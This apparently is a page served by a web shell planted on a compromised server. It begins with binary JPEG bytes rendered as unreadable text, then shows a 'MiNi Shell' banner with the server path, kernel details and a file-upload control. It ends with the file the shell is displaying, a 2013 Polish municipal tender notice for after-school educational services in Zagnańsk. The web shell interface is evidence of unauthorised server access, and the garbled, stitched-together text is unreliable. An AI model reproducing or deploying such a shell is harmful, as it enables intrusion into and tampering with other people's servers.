JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130912/370594-N-2013.html

<p class="kh_header"><b>Zagnańsk: Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Wiem, że potrafię Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 370594 - 2013; data zamieszczenia: 12.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagnańsk , ul. Spacerowa 8, 26-050 Zagnańsk, woj. świętokrzyskie, tel. 41 3001322, faks 41 3001373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagnansk.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Wiem, że potrafię Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są Usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Wiem, że potrafię Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Harmonogram zajęć będzie ustalany w porozumieniu z Dyrektorem Szkoły i koordynatorem projektu. Zajęcia w ramach zadań 1, 2 i 3 (zajęcia wyrównawcze z języka angielskiego, języka polskiego i matematyki) będą prowadzone w soboty natomiast zajęcia w ramach zadań 4, 5 i 6 (zajęcia w ramach Szkolnego Ośrodka Kariery, spotkania z psychologiem oraz zajęcia kursu technik efektywnego uczenia się) odbywać się będą w dni prowadzenia zajęć szkolnych,  o różnych porach dnia, uwzględniając godziny przedpołudniowe - tak aby uczestnicy projektu mogli brać w nich udział.

2. Szczegółowy opis przedmiotu zamówienia:
Zakres, ilość i rodzaj zajęć w szkole określają szczegółowe zadania stanowiące części zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy. Jednostka 1 h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut. Usługi będą realizowane w Szkole Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku. W przypadku Zadania 4 oraz 5 przez 1 godzinę (dyżuru lub prelekcji) rozumie się 60 minut.

2.1 Zadanie nr 1 
Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul. Turystyczna 59, 26-050 Zagnańsk
Zajęcia wyrównawcze z języka polskiego dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej - 24 osoby (3 grupy: 8 uczniów)
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r.

2.2 Zadanie nr 2 
Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk
Zajęcia wyrównawcze z języka angielskiego dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej - 24 osoby (3 grupy: 8 uczniów)
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r.

2.3 Zadanie nr 3 
Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk
Zajęcia wyrównawcze z matematyki dla dzieci, które mają trudności z opanowaniem materiału przewidzianego w podstawie programowej 24 osoby (3 grupy: 8 uczniów)
Łączna liczba godzin lekcyjnych: 90 w tym:
30 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
60 h - w okresie styczeń 2014r. - czerwiec 2014 r.

2.4 Zadanie nr 4
Zespół Szkoły Podstawowej nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk
Szkolny Ośrodek Kariery, zajęcia w ramach Szkolnego Ośrodka Kariery kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka)  26 osób to minimalna liczba uczniów, którzy opracują indywidualne plany kariery zawodowej lub karty mocnych i słabych stron w ramach SzOK (16 osób opracuje indywidualne plany kariery zawodowej a 10 osób karty mocnych i słabych stron).
Łączna liczba godzin: 36 w tym:
10 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
26 h - w okresie styczeń 2014r. - czerwiec 2014 r.

2.5 Zadanie nr 5, Szkoła Podstawowa nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk
Wsparcie psychologa, zajęcia kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka) wsparciem objęci są wszyscy uczestnicy projektu (ok. 70 osób)
Łączna liczba godzin: 54 (w tym 18 godz. prelekcji) w tym:
12 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
42 h - w okresie styczeń 2014r. - czerwiec 2014 r.

2.6 Zadanie nr 6, Szkoła Podstawowa nr 2 i Gimnazjum im. St. Staszica w Zagnańsku, ul.  Turystyczna 59, 26-050 Zagnańsk
Kurs technik efektywnego uczenia się, zajęcia kierowane są do uczniów osiągających słabe wyniki z przedmiotów egzaminacyjnych (język polski, język angielski i matematyka) 20 osób (2 grupy:10 osób)
Łączna liczba godzin lekcyjnych: 60 w tym:
10 h - w okresie wrzesień 2013 r. - grudzień 2013 r.
50 h - w okresie styczeń 2014r. - czerwiec 2014 r.

3 Wymagania i obowiązki Wykonawcy:

3.1 W przypadku zadań nr 1, 2 i 3
1)przeprowadzenie diagnozy (test kompetencji) dotyczącej posiadanej wiedzy przez ucznia oraz  opracowywanie programu nauczania zajęć pozalekcyjnych uwzględniającego nowoczesne metody nauczania (dla każdej grupy jeden program) i przedstawianie do akceptacji dyrektorowi szkoły i koordynatorowi projektu. Program nauczania powinien być zgodny z podstawą programową i powstać w oparciu o diagnozę przeprowadzoną przez nauczyciela na I zajęciach i uwzględniać zarówno możliwości jak i potrzeby uczniów oraz być dostosowany do wieku uczestników.
2)prowadzenie zajęć pozalekcyjnych (godz. lekcyjnych zgodnie z projektem 
i harmonogramem zadań w projekcie), w terminie maksymalnym do 30.06.2014 r. w grupie,grupach osobowej,osobowych wg zaakceptowanego planu pracy (zajęcia będą się odbywać w soboty)
3)program nauczania przewiduje prowadzenie zajęć w atrakcyjnej formie dla uczniów oraz przy użyciu nowoczesnych metod nauczania. Przewiduje również przyrost wiedzy uczniów z danego przedmiotu o co najmniej 10 %.
4)dbałość o zapewnienie odpowiedniej frekwencji na zajęciach
5)dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć, sprawozdaniach
6)informowanie wychowawcy, dyrektora, koordynatora projektu o wynikach 
i osiągnięciach uczniów
7)przygotowanie na prośbę koordynatora projektu sprawozdań oraz zestawień dotyczących własnej pracy
8)prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz comiesięczne przekazywanie w formie elektronicznej informacji dyrektorowi szkoły,  w której realizowany jest projekt oraz koordynatorowi o stanie realizacji planu zajęć,  w tym ilości zrealizowanych godzin
9)dokumentowanie wyników i osiągnięć uczniów w formie testów wiedzy (co najmniej na pierwszych i ostatnich zajęciach)
10)uczestnictwo w spotkaniach  z rodzicami uczestników projektu oraz zespołu projektowego
11)decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć  ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy w praktyce
12)Przeprowadzenie dodatkowych czynności wynikających ze zmiany wniosku o dofinansowanie a dotyczących bezpośrednio realizowanego zadania (np. przeprowadzenie konkursów wśród uczestników projektu)
13)wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracę  
z koordynatorem projektu w mierzeniu postępów uczniów w zakresie rezultatów projektu
14)przestrzegania regulaminu pracowni, w której prowadzone są zajęcia oraz ponoszenie odpowiedzialności materialnej za mienie
15)za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia odpowiedzialność ponosi Wykonawca.
16)wymagana jest należyta staranność określona w art. 355 Kodeksu cywilnego przy realizacji zobowiązań umowy

3.2 W przypadku zadania nr 4
1) pomoc w opracowaniu przez przynajmniej 16 uczniów z Gimnazjum indywidualnych planów kariery zawodowej oraz przez 10 uczniów Szkoły Podstawowej kart samooceny (swoich mocnych i słabych stron)  
2) prowadzenie dyżurów w ramach Szkolnego Ośrodka Kariery (godz. zgodnie 
z projektem i harmonogramem zadań w projekcie oraz harmonogramem określonym przez koordynatora projektu umożliwiającym uczniom uczestnictwo w spotkaniach, uwzględniając godziny przedpołudniowe), w terminie maksymalnym do 30.06.2014 r. w grupie,grupach osobowej,osobowych wg zaakceptowanego planu pracy 
3) dbałość o zapewnienie odpowiedniej frekwencji na zajęciach,
4) dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć, sprawozdaniach
5) informowanie wychowawcy, dyrektora, koordynatora projektu o wynikach 
i osiągnięciach uczniów
6) przygotowanie na prośbę koordynatora projektu sprawozdań oraz zestawień dotyczących własnej pracy 
7) prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz comiesięczne przekazywanie w formie elektronicznej informacji dyrektorowi szkoły,  w której realizowany jest projekt oraz koordynatorowi o stanie realizacji planu zajęć,  w tym ilości zrealizowanych godzin
8) uczestnictwo w spotkaniach  z rodzicami uczestników projektu oraz zespołu projektowego  
9) decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć  ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy 
w praktyce
10) Przeprowadzenie dodatkowych czynności wynikających ze zmiany wniosku o dofinansowanie a dotyczących bezpośrednio realizowanego zadania (np: przeprowadzenie konkursów wśród uczestników projektu)
11) wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracę z koordynatorem projektu w mierzeniu postępów uczniów w zakresie rezultatów projektu
12) przestrzegania regulaminu pracowni, w której prowadzone są zajęcia oraz ponoszenie odpowiedzialności materialnej za mienie
13) za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia odpowiedzialność ponosi Wykonawca.
14) wymagana jest należyta staranność określona w art. 355 Kodeksu cywilnego przy realizacji zobowiązań umowy

3.3 W przypadku zadania nr 5
1) przeprowadzenie ankiet wśród wszystkich uczestników projektu (ok. 70 osób) na początku i na końcu realizowanego projektu mających na celu ocenę poziomu ich samooceny i motywacji do nauki.
2) przeprowadzenie prelekcji dla uczestników projektu w liczbie ( godz. zgodnie 
z projektem i harmonogramem zadań w projekcie oraz harmonogramem określonym przez koordynatora projektu umożliwiającym uczniom uczestnictwo w spotkaniach, uwzględniając godziny przedpołudniowe), których efektem będzie wzrost własnej samooceny uczniów i motywacji do nauki. Prelekcje zostaną przeprowadzone w terminie maksymalnym do 30.06.2014r.
3) prowadzenie dyżurów w punkcie psychologa(godzin zgodnie z projektem 
i harmonogramem zadań w projekcie oraz harmonogramem określonym przez koordynatora projektu umożliwiającym uczniom uczestnictwo w spotkaniach), w terminie maksymalnym do 30.06.2014 r. 
3) dbałość o zapewnienie odpowiedniej frekwencji na prelekcjach 
4) dokumentowanie spotkań w dzienniku zajęć, sprawozdaniach
5) informowanie wychowawcy, dyrektora, koordynatora projektu o wynikach 
swojej pracy
6) przygotowanie na prośbę koordynatora projektu sprawozdań oraz zestawień dotyczących własnej pracy  
7) prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz comiesięczne przekazywanie w formie elektronicznej informacji dyrektorowi szkoły,  w której realizowany jest projekt oraz koordynatorowi o stanie realizacji planu zajęć,  w tym ilości zrealizowanych godzin
8) uczestnictwo w spotkaniach  z rodzicami uczestników projektu oraz zespołu projektowego  
9) decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć
10) Przeprowadzenie dodatkowych czynności wynikających ze zmiany wniosku o dofinansowanie a dotyczących bezpośrednio realizowanego zadania
11) wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracę  
z koordynatorem projektu w mierzeniu postępów uczniów w zakresie rezultatów projektu
12) przestrzegania regulaminu pracowni, w której prowadzone są zajęcia oraz ponoszenie odpowiedzialności materialnej za mienie
13) za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia odpowiedzialność ponosi Wykonawca.
14) wymagana jest należyta staranność określona w art. 355 Kodeksu cywilnego przy realizacji zobowiązań umowy.

3.4 W przypadku zadania nr 6
1) przeprowadzenie diagnozy dotyczącej posiadanej wiedzy przez ucznia,  opracowanie programu nauczania zajęć pozalekcyjnych przewidującego naukę technik efektywnego uczenia się oraz przedstawianie go do akceptacji dyrektorowi szkoły i koordynatorowi projektu.
2) prowadzenie zajęć pozalekcyjnych w liczbie (godz. lekcyjnych zgodnie z projektem i harmonogramem zadań w projekcie oraz harmonogramem określonym przez koordynatora projektu umożliwiającym uczniom uczestnictwo w spotkaniach), w terminie maksymalnym do 30.06.2014 r. w grupie,grupach  osobowej,osobowych wg zaakceptowanego planu pracy
3) program nauczania przewiduje prowadzenie zajęć w atrakcyjnej formie dla uczniów oraz przy użyciu nowoczesnych metod nauczania. Przewiduje również przyrost wiedzy w zakresie technik efektywnego uczenia się u każdego z uczniów biorących udział w zajęciach
4) dbałość o zapewnienie odpowiedniej frekwencji na zajęciach
5) dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć, sprawozdaniach
6) informowanie wychowawcy, dyrektora, koordynatora projektu o wynikach 
i osiągnięciach uczniów
7) przygotowanie na prośbę koordynatora projektu sprawozdań oraz zestawień dotyczących własnej pracy 
8) prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz comiesięczne przekazywanie w formie elektronicznej informacji dyrektorowi szkoły,  w której realizowany jest projekt oraz koordynatorowi o stanie realizacji planu zajęć,  w tym ilości zrealizowanych godzin
9) dokumentowanie wyników i osiągnięć uczniów w formie testów wiedzy (co najmniej na pierwszych 
i ostatnich zajęciach)
10) uczestnictwo w spotkaniach  z rodzicami uczestników projektu oraz zespołu projektowego  
11) decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć  ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy 
w praktyce
12) Przeprowadzenie dodatkowych czynności wynikających ze zmiany wniosku o dofinansowanie a dotyczących bezpośrednio realizowanego zadania (np.: przeprowadzenie konkursów wśród uczestników projektu)
13) wspomaganie promocji i ewaluacji projektu - informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracę  z koordynatorem projektu w mierzeniu postępów uczniów w zakresie rezultatów projektu
14) przestrzegania regulaminu pracowni, w której prowadzone są zajęcia oraz ponoszenie odpowiedzialności materialnej za mienie
15) za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia odpowiedzialność ponosi Wykonawca.
16) wymagana jest należyta staranność określona w art. 355 Kodeksu cywilnego przy realizacji zobowiązań umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo Zamówień Publicznych) 
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg kryterium spełnia/nie spełnia  na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. w przypadku zajęć doradztwa edukacyjno-zawodowego: posiadać wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz uprawnienia do prowadzenia zajęć dotyczących doradztwa edukacyjno - zawodowego.
b. w przypadku kursu technik efektywnego uczenia się: posiadać wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz posiadać odpowiednie uprawnienia do prowadzenia kursu technik efektywnego uczenia się.
c. w przypadku wsparcia psychologa: wykształcenie wyższe, kierunek/specjalizacja: psycholog (zgodnie z ustawą z dnia 8 czerwca 2001r o zawodzie psychologa 
i samorządzie zawodowym psychologów Dz.U. 2001, nr 73, poz. 763) i co najmniej 2-letnie doświadczenie zawodowe w prowadzeniu zadań o tematyce zbliżonej do przedstawionej w SIWZ
d. w pozostałych: posiadać wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz uprawnienia do prowadzenia zajęć w przedmiocie zamówienia 
i stopień awansu zawodowego co najmniej nauczyciela mianowanego, przynajmniej 
3-letnie doświadczenie zawodowe w pracy z dziećmi na poziomie zarówno szkoły podstawowej jak i gimnazjum oraz bardzo dobrą znajomość obsługi komputera 
i nowoczesnych technologii nauczania (tablica multimedialna) 
Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli złoży oświadczenie o spełnieniu warunków udziału 
w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo zamówień publicznych) 
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg kryterium spełnia/nie spełnia  na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. w przypadku zajęć kursu technik efektywnego uczenia się: dysponować autorskim programem nauczania, opracowanymi materiałami dydaktycznymi (podręcznik) oraz metodami pomiaru przyrostu umiejętności.
b. w pozostałych przypadkach zamawiający nie wymaga wykazywania potencjału technicznego.
Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania odpowiednim potencjałem technicznym jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo zamówień publicznych)
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg kryterium spełnia/nie spełnia  na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. w przypadku zadań 1,2 i 3 dysponowanie osobą lub osobami posiadającymi wykształcenie wyższe kierunkowe w określonej dziedzinie i posiadające minimum 
3 lata doświadczenia w nauczaniu dzieci szkół podstawowych i gimnazjalnych oraz posiadającymi bardzo dobrą znajomość nowoczesnych technologii nauczania
b. w przypadku zadania 4 i 6 dysponowanie osobą lub osobami posiadającymi wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz posiadać odpowiednie uprawnienia do prowadzenia odpowiednio zajęć z doradztwa edukacyjno - zawodowego(zad.4) lub kursu technik efektywnego uczenia się (zad. 6).
c. w przypadku zadania 5 dysponowanie osobą lub osobami posiadającymi wykształcenie wyższe kierunkowe w określonej dziedzinie i co najmniej 2-letnie doświadczenie zawodowe w prowadzeniu zadań o tematyce zbliżonej do przedstawionej w SIWZ
Zamawiający uzna, że Wykonawca spełnia warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia jeżeli dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia,  posiadającą kwalifikacje niezbędne do wykonania zamówienia(wymienione powyżej) lub Wykonawca posiada niezbędne kwalifikacje. 
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg kryterium spełnia/nie spełnia  na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia (na podstawie art. 44 Prawo zamówień publicznych).
Ocena spełniania warunków udziału w postępowania dokonana zostanie wg kryterium spełnia/nie spełnia  na podstawie złożonych dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

